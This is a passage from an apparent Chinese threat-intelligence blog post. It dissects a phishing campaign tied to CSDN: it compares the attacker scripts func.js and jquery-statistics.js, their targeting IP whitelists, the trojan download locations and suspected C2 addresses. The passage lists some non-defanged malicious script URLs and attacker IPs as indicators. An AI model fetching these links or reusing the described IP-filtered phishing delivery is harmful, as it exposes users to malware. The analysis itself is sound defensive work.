0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">而103.43.16.195 和 144.48.240.1 的钓鱼页面中的下载地址都指向chromium.hk.cn。</span></p><p><img data-imgfileid="100001394" class="rich_pages wxw-img" data-ratio="0.5229151014274981" data-s="300,640" data-type="png" data-w="2662" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=5e9f9d2f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8ag4xskKAIftHNwjRF5PMr9GlBS2UQacHEJ5PQVlUgEF9kI2U7Y1s5A%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><img data-imgfileid="100001395" class="rich_pages wxw-img" data-ratio="0.5572289156626506" data-s="300,640" data-type="png" data-w="2656" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=f26c65f4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8nwTs49C3fqd5mrsVuXTkNt7L8H7FX2cah3j84gicZicGMkRTD8ibU4Uag%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">但是仔细看下来这套模板跟本次事件中出现的模板源码又不太相同，本次出现的源码没有这些 cookie 判断逻辑。</span></p><p><img data-imgfileid="100001396" class="rich_pages wxw-img" data-ratio="0.523921568627451" data-s="300,640" data-type="png" data-w="2550" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=ff06938c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8hDPBCPNXChGYNGn30XZI2nTLYKiaQ4bu5F0u7TKicVPp6m43jOGKjq6A%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">到这里钓鱼模板这条线基本就没有什么新的线索了。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">当然了，说到底上面这两个 XSS 平台也不见得就是 CSDN 这次的攻击者本人的，仅仅靠一个忘记删除的域名产生的关联比较弱，也许是某些大厂内部攻击平台的钓鱼页面在流传出来的时候不小心带上的呢，这些可能性都是存在的。</span></p><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 18px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">分析一下func.js</span></span><span style="display: none;"></span></h4><h5 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">钓鱼页面的区别</span></span><span style="display: none;"></span></h5><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">前面说到 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://sslupdate[.]net " target="_blank">https://sslupdate[.]net </a></span></code><span leaf=""> 被关闭，在攻击者关闭这个 web 之前，可以访问到 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://sslupdate[.]net/func.js" target="_blank">https://sslupdate[.]net/func.js</a></span></code><span leaf=""> 。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">后来攻击者关闭服务，过了几天偷偷打开服务的时候，</span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">sslupdate[.]net</span></code><span leaf=""> 是无法解析的，但是  </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://47.239.5.111/func.js" target="_blank">https://47.239.5.111/func.js</a></span></code><span leaf="">  还是可以访问到的。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">但是现在攻击者不知道啥时候把 func.js 给删除掉了，只保留了 index.html。</span></p><p><img data-imgfileid="100001397" class="rich_pages wxw-img" data-ratio="0.1941747572815534" data-s="300,640" data-type="png" data-w="2060" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=2abf719a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8BwicLJexm4GzFaKVUib6gmOiawjPHKHI5SuuicWYVnKsROr6goicNzvbGzA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">func.js 这个 URI 只在 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://update.sslcsdn.com/func.js" target="_blank">https://update.sslcsdn.com/func.js</a></span></code><span leaf=""> 这里出现过， </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://update.sslcsdn.com/func.js" target="_blank">https://update.sslcsdn.com/func.js</a></span></code><span leaf=""> 的用途是为经过 jquery-statistics.js 筛选过后的 IP 展示钓鱼页面。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">但是在分析 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://sslupdate[.]net/func.js" target="_blank">https://sslupdate[.]net/func.js</a></span></code><span leaf=""> 这里下载到的 func.js 这个文件的时候，发现这个文件似乎既包含筛选 IP 列表的功能，又包含返回钓鱼 html 页面的功能。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">并且重要的是 jquery-statistics.js  是被混淆过的，func.js 没有被混淆。</span></p><p><img data-imgfileid="100001399" class="rich_pages wxw-img" data-ratio="0.6642394822006472" data-s="300,640" data-type="png" data-w="2472" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=0d43ff62&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8icACSKQRVS9sndKjYASCGewUkwBrA9DLeGCo9Vf3H6o2gQsAuibulTEQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">钓鱼 html 被编码在下面一坨里。看上去这个版本的方案是打算请求 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://update.sslcsdn[.]com/checkip?ip=" target="_blank">https://update.sslcsdn[.]com/checkip?ip=</a></span></code><span leaf=""> 来二次判断来源 IP 是否在白名单里，如果在白名单的话才返回钓鱼网页。</span></p><p><img data-imgfileid="100001398" class="rich_pages wxw-img" data-ratio="0.24284475281873374" data-s="300,640" data-type="png" data-w="2306" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=97733ffd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8Zb0fyhySUmsnu3NRM2lAIN6hJ3ONSpeYpI7Dd0Kl7EjMQeEwWe2eFA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">把编码的 html 解码还原之后，和 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://update.sslcsdn[.]com/index.html" target="_blank">https://update.sslcsdn[.]com/index.html</a></span></code><span leaf=""> 对比发现，编码的 html 不是被保存过的（没有saved标签），另外就是木马的下载地址似乎也被修改过了，从 sslcsdn 下载修改为去阿里云OSS下载。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">看上去 func.js 里的这个编码版本要么是攻击者用来做测试的版本，要么是前期投毒行动时没有被捕捉到的版本。</span></p><p><img data-imgfileid="100001400" class="rich_pages wxw-img" data-ratio="0.14634146341463414" data-s="300,640" data-type="png" data-w="3362" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=1b35075a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh846Sac8FWUCMKpSryCaQX48LkVKSoytREYQfDvdDnETntgJu54ZmYxA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h5 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">IP列表的区别</span></span><span style="display: none;"></span></h5><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">一开始 fox 说 func.js 是未混淆版的，只顾着看混淆没有留意 js 里面的 IP 列表，后来回来梳理的时候才发现 func.js 跟 jquery-statistics.js 的 IP &#34;白名单&#34; 是不一样的。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">用正则提取 jquery-statistics.js  当中的 IP 地址去重后可以得到 179 个IP地址，而  func.js 只包含 12 个 IP 地址（其中有一个C）。</span></p><p><img data-imgfileid="100001401" class="rich_pages wxw-img" data-ratio="0.30775788576300084" data-s="300,640" data-type="png" data-w="2346" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=69497991&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh80TYXiaIeVibGROVtZZ0ef5Jyq2JUJYlea08jgEAzBJFhwpajvbqXoBiaA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">这马上让我开始警觉起来，有没有可能这些 IP 地址是攻击者自己的 IP 地址，而这个 js 是他们前期自己测试使用的呢？</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">我对两边的 IP 做了一下对比，发现 func.js 当中黄色框这部分 IP 是 jquery-statistics.js 没有再出现过的，红色框 IP 是比较可疑的地址。</span></p><p><img data-imgfileid="100001402" class="rich_pages wxw-img" data-ratio="0.5795795795795796" data-s="300,640" data-type="png" data-w="1998" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=f0dae9e6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8wYqeSoqxx1OOEFaQzlJDibRVD65tRTFAnjvmOmPE0rMkWonQgq5P98w%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">其中 8.218.160.70:7000 在11月底开放过 frp 服务。</span></p><p><img data-imgfileid="100001403" class="rich_pages wxw-img" data-ratio="0.3237095363079615" data-s="300,640" data-type="png" data-w="2286" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=5893724b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh85A6SX0AaibH6IDys2OD2LxO6iajibIK22tnicvQicZhZsicziaVQGVbUibc8zw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">使用受害者的 IP 在 VT 基本都可以搜索出来本次事件中的 js 样本（因为js里面包含这个IP），但是 8.218.160.70、38.181.72.101没有关联出任何 js 样本。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">8.218.160.70 实际上在我们获取到的 jquery-statistics.js 当中，也有可能是我们这个版本的 js 没有被上传 VT。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">但是 38.181.72.101 在整个事件分析当中确确实实只出现了这一次，Cogent 的 IP 却出现了多次。</span></p><p><img data-imgfileid="100001404" class="rich_pages wxw-img" data-ratio="0.48841354723707664" data-s="300,640" data-type="png" data-w="2244" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=62e9f3b4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8NWOClQ0wg6yibicNf3AWk4Ryd3zA6zeib1X4xzibicqFxd9zSYJKL4rYRFg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><img data-imgfileid="100001406" class="rich_pages wxw-img" data-ratio="0.5363724539282251" data-s="300,640" data-type="png" data-w="2062" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=75a43eab&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8KV0qyTIKO14hblnV5oslibY321rcyHJoLRWPX0S1cW2wib61ksekxwFQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">另外 116.213.40.49 这个 IP 虽然关联出了好几个js样本，但是有一个C2 116.213.40.186 跟它同C段。</span></p><p><img data-imgfileid="100001405" class="rich_pages wxw-img" data-ratio="0.2505091649694501" data-s="300,640" data-type="png" data-w="1964" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=928b662b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh86VAhZaFic7hnILvlDibb5d4vZXqfC3E3ib4FN3A3KuMEf9pL5diaxNajxA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">至于黄色框里的 IP 为什么没有在 jquery-statistics.js  再次出现，我不确定是因为这些人已经中招，没有必要再放进去，还是有其他的原因。</span></p><h5 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">JS版本的区别</span></span><span style="display: none;"></span></h5><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">分析到 IP 地址的时候我才突然意识到，js 文件是随时可以变化的，所以攻击者被抓取到的 js 当中的攻击目标 IP 清单也不一定完整。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">这就是为什么我在 VT 根据受害者的 IP 搜索关联 js 样本的时候关联出了好几个版本的 js，结合  jquery-statistics.js 当中比较可疑的境外 IP ，我对几个比较有代表性的 js 样本做了一下关联梳理。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">可以看到 js 的大小有很多版本，并且每个版本当中同时包含的境外 